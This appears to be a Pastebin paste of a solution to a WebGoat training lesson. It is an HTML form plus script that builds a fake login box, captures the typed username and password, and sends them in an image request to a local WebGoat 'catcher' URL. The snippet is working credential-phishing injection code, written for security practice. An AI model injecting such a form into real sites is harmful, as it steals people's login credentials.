Advertisement
Guest User

Untitled

a guest
Dec 2nd, 2018
186
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.59 KB | None | 0 0
  1. <br>
  2. <form>
  3. <br>User
  4. <br><input type="text" name="user" id='user'>
  5. <br>Password
  6. <br><input type="password" name="pass" id='password'>
  7. <br><input type="button" onclick="hack()" value="Login">
  8. </form>
  9. <script>
  10. function hack(){
  11. var user = document.getElementById('user').value;
  12. var password = document.getElementById('password').value;
  13. image = new Image;
  14. image.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes"+"&user="+user+"&pass="+password;
  15. console.log(image.src);
  16. alert(user + " " + password);
  17. }
  18. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement